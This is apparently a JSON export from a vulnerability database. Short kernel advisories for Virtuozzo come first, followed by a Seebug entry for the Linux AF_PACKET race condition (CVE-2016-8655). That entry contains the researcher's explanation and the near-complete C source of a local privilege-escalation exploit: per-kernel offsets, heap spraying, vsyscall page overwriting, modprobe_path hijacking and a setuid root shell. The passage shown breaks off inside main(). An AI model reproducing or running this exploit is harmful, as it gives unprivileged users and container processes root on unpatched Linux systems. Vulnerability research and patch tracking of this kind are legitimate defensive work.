and create memory corruption or possibly privilege escalation.\n\n", "modified": "2017-11-20T00:00:00", "published": "2017-11-20T00:00:00", "id": "VZA-2017-107", "href": "https://help.virtuozzo.com/customer/portal/articles/2904978", "title": "Kernel security update: CVE-2017-15265; new kernel 2.6.32-042stab126.1, Virtuozzo 6.0 Update 12 Hotfix 18 (6.0.12-3688)", "type": "virtuozzo", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:22", "bulletinFamily": "unix", "description": "This update provides a new Virtuozzo Containers for Linux 4.7 kernel 2.6.32-042stab125.5 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.10.2.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2017-15274\nA flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameters value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops).\n\n", "modified": "2017-10-23T00:00:00", "published": "2017-10-23T00:00:00", "id": "VZA-2017-095", "href": "https://help.virtuozzo.com/customer/portal/articles/2892716", "title": "Kernel security update: CVE-2017-15274; new kernel 2.6.32-042stab125.5 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-05T11:28:18", "bulletinFamily": "unix", "description": "This update provides a new Virtuozzo 6.0 kernel 2.6.32-042stab125.5 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.10.2.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2017-15274\nA flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameters value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops).\n\n", "modified": "2017-10-23T00:00:00", "published": "2017-10-23T00:00:00", "id": "VZA-2017-096", "href": "https://help.virtuozzo.com/customer/portal/articles/2892717", "title": "Kernel security update: CVE-2017-15274; new kernel 2.6.32-042stab125.5, Virtuozzo 6.0 Update 12 Hotfix 17 (6.0.12-3687)", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:37", "bulletinFamily": "exploit", "description": "To create AF_PACKET sockets you need CAP_NET_RAW in your network\r\nnamespace, which can be acquired by unprivileged processes on\r\nsystems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc).\r\nIt can be triggered from within containers to compromise the host kernel.\r\nOn Android, processes with gid=3004/AID_NET_RAW are able to create\r\nAF_PACKET sockets (mediaserver) and can trigger the bug.\r\n\r\nI found the bug by reading code paths that have been opened up by the\r\nemergence of unprivileged namespaces, something I think should be\r\noff by default in all Linux distributions given its history of\r\nsecurity vulnerabilities.\r\n\r\nThe problem is inside packet_set_ring() and packet_setsockopt().\r\nWe can reach packet_set_ring() by calling setsockopt() on the socket\r\nusing the PACKET_RX_RING option.\r\n\r\nIf the version of the packet socket is TPACKET_V3, a timer_list\r\nobject will be initialized by packet_set_ring() when it calls\r\ninit_prb_bdqc().\r\n```\r\n...\r\n switch (po->tp_version) {\r\n case TPACKET_V3:\r\n /* Transmit path is not supported. We checked\r\n * it above but just being paranoid\r\n */\r\n if (!tx_ring)\r\n init_prb_bdqc(po, rb, pg_vec, req_u);\r\n break;\r\n default:\r\n break;\r\n }\r\n...\r\n```\r\nThe function flow to set up the timer is:\r\npacket_set_ring()->init_prb_bdqc()->prb_setup_retire_blk_timer()->\r\nprb_init_blk_timer()->prb_init_blk_timer()->init_timer()\r\n\r\nWhen the socket is closed, packet_set_ring() is called again\r\nto free the ring buffer and delete the previously initialized\r\ntimer if the packet version is > TPACKET_V2:\r\n\r\n```\r\n...\r\n if (closing && (po->tp_version > TPACKET_V2)) {\r\n /* Because we don't support block-based V3 on tx-ring */\r\n if (!tx_ring)\r\n prb_shutdown_retire_blk_timer(po, rb_queue);\r\n }\r\n...\r\n```\r\n\r\nThe issue is that we can change the packet version to TPACKET_V1\r\nwith packet_setsockopt() after init_prb_bdqc() has been executed\r\nand before packet_set_ring() has returned.\r\n\r\nThere is an attempt to deny changing socket versions after a ring\r\nbuffer has been initialized, but it is insufficient:\r\n```\r\n...\r\n case PACKET_VERSION:\r\n {\r\n...\r\n if (po->rx_ring.pg_vec || po->tx_ring.pg_vec)\r\n return -EBUSY;\r\n...\r\n```\r\nThere's plenty of room to race this code path between the calls to\r\ninit_prb_bdqc() and swap(rb->pg_vec, pg_vec) in packet_set_ring().\r\n\r\nWhen the socket is closed, packet_set_ring() will not delete the\r\ntimer since the socket version is now TPACKET_V1. The struct\r\ntimer_list that describes the timer object is located inside the\r\nstruct packet_sock for the socket itself however and will be\r\nfreed with a call to kfree().\r\n\r\nWe then have a use-after-free on a timer object that can be\r\nexploited by various poisoning attacks on the SLAB allocator (I find\r\nadd_key() to be the most reliable). This will ultimately lead to the\r\nkernel jumping to a manipulated function pointer when the timer expires.\r\n\r\nThe bug is fixed by taking lock_sock(sk) in packet_setsockopt() when\r\nchanging the packet version while also taking the lock at the start\r\nof packet_set_ring().\r\n\r\nMy exploit defeats SMEP/SMAP and will give a rootshell on Ubuntu 16.04,\r\nI will hold off a day on publishing it so people have some time to update.\r\n\r\nNew Ubuntu kernels are out so please update as soon as possible.\r\n\r\n=*=*=*=*=*=*=*=*= TIMELINE =*=*=*=*=*=*=*=*=\r\n```\r\n2016-11-28: Bug reported to security () kernel org\r\n2016-11-30: Patch submitted to netdev, notification sent to linux-distros\r\n2016-12-02: Patch committed to mainline kernel\r\n2016-12-06: Public announcement\r\n```", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92567", "id": "SSV:92567", "type": "seebug", "title": "Linux af_packet.c race condition (local root) (CVE-2016-8655)", "sourceData": "\n /*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n \r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n \r\n \r\nstage 1 completed\r\nregistering new sysctl..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n \r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n \r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n \r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n \r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n \r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n \r\n11/2016\r\nby rebel\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n \r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n \r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n \r\n \r\nstruct offset *off = NULL;\r\n \r\n//99% of these offsets haven't actually been tested :)\r\n \r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic #68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n {\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n {\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n {\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic #37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n {\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic #62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n \r\n#define VSYSCALL 0xffffffffff600000\r\n \r\n#define PAD 64\r\n \r\nint pad_fds[PAD];\r\n \r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n \r\n#define CONF_RING_FRAMES 1\r\n \r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n \r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n \r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n \r\n while(barrier) {}\r\n \r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n y++;\r\n \r\n if(x != 0) break;\r\n \r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n if(x != 0) break;\r\n \r\n y++;\r\n }\r\n \r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n \r\n \r\n return NULL;\r\n}\r\n \r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n \r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n \r\n \r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n \r\n for(x=0; x<PAD; x++)\r\n if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n}\r\n \r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n \r\n sigemptyset(&set);\r\n \r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n \r\n pad_kmalloc();\r\n \r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n \r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n pad_kmalloc();\r\n \r\n fprintf(stderr,\"sockets allocated\\n\");\r\n \r\n val = TPACKET_V3;\r\n \r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n \r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n \r\n sfd = fd;\r\n \r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n \r\n \r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n \r\n usleep(200000);\r\n \r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n \r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n \r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n \r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n \r\n \r\n barrier = 0;\r\n \r\n usleep(100000);\r\n \r\n while(!vers_switcher_done)usleep(100000);\r\n \r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n \r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n \r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n \r\n \r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n \r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n \r\n \r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n \r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n \r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n \r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n \r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n \r\n close(sfd);\r\n \r\n kmalloc();\r\n \r\n fprintf(stderr,\"all messages sent\\n\");\r\n \r\n sleep(31337);\r\n exit(1);\r\n}\r\n \r\n \r\nint verification_result = 0;\r\n \r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n \r\n \r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n \r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n signal(SIGSEGV, catch_sigsegv);\r\n \r\n *vsyscall = 0xdeadbeef+x;\r\n \r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n \r\n pthread_join(v_thread, NULL);\r\n \r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not modify vsyscall\\n\");\r\n \r\n exit(1);\r\n}\r\n \r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n \r\n \r\n}\r\n \r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n \r\nretry:\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n \r\n wait(&status);\r\n \r\n printf(\"\\n\");\r\n \r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n \r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n \r\n \r\n \r\n kill(pid, 9);\r\n}\r\n \r\n \r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n \r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n \r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n \r\n printf(\"\\nstage 1 completed\\n\");\r\n \r\n sleep(5);\r\n \r\n printf(\"registering new sysctl..\\n\\n\");\r\n \r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n \r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n \r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n \r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n \r\n printf(\"stage 2 completed\\n\");\r\n}\r\n \r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n \r\n \r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n \r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n \r\n memset(buf,'\\x00', 256);\r\n \r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n \r\n write(fd,buf,strlen(buf)+1);\r\n \r\n socket(AF_INET,SOCK_STREAM,132);\r\n \r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n \r\n else\r\n printf(\"could not create rootshell\\n\");\r\n \r\n \r\n}\r\n \r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n \r\n \r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n \r\n \r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n \r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n 